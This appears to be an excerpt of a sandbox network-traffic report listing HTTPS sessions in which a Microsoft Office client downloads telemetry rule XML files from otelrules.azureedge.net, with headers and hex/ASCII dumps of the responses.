                                                                                                                                                                                                        2024-12-02 06:39:17 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        94192.168.2.84989913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:16 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:17 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 958
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                        x-ms-request-id: 87286592-701e-0053-7b27-443a0a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063917Z-174f7845968jrjrxhC1EWRmmrs000000147g000000003g05
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:17 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        95192.168.2.84990013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:16 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:17 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                        x-ms-request-id: 4c7796e8-801e-0083-47a6-43f0ae000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063917Z-174f7845968n2hr8hC1EWR9cag00000013n000000000bebc
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:17 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        96192.168.2.84990213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:18 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:18 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 3342
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                        x-ms-request-id: 6707dec4-701e-0050-76f7-416767000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063918Z-174f7845968cdxdrhC1EWRg0en0000001430000000002gmn
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:18 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        97192.168.2.84990613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:19 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                        x-ms-request-id: 4793f8bc-701e-0053-5872-433a0a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063919Z-174f7845968ljs8phC1EWRe6en00000013y0000000004zsm
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        98192.168.2.84990513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:19 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                        x-ms-request-id: 5bb85073-401e-005b-22cf-439c0c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063919Z-174f784596886s2bhC1EWR743w0000001440000000004qpa
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        99192.168.2.84990313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:19 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                        x-ms-request-id: a7f5da2f-b01e-0070-7a69-431cc0000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063919Z-174f7845968zgtf6hC1EWRqd8s0000000wz00000000091cx
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        100192.168.2.84990413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:19 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                        x-ms-request-id: d2df421c-b01e-0021-5593-43cab7000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063919Z-174f7845968jrjrxhC1EWRmmrs000000143000000000d1wp
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:19 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        101192.168.2.84990713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:20 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:20 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                        x-ms-request-id: c2b00c79-201e-0000-27b2-42a537000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063920Z-174f78459685m244hC1EWRgp2c000000140g0000000003kx
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:20 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        102192.168.2.84991113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:21 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                        x-ms-request-id: 73839456-501e-000a-0a63-430180000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063921Z-174f7845968cpnpfhC1EWR3afc00000013sg000000002311
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


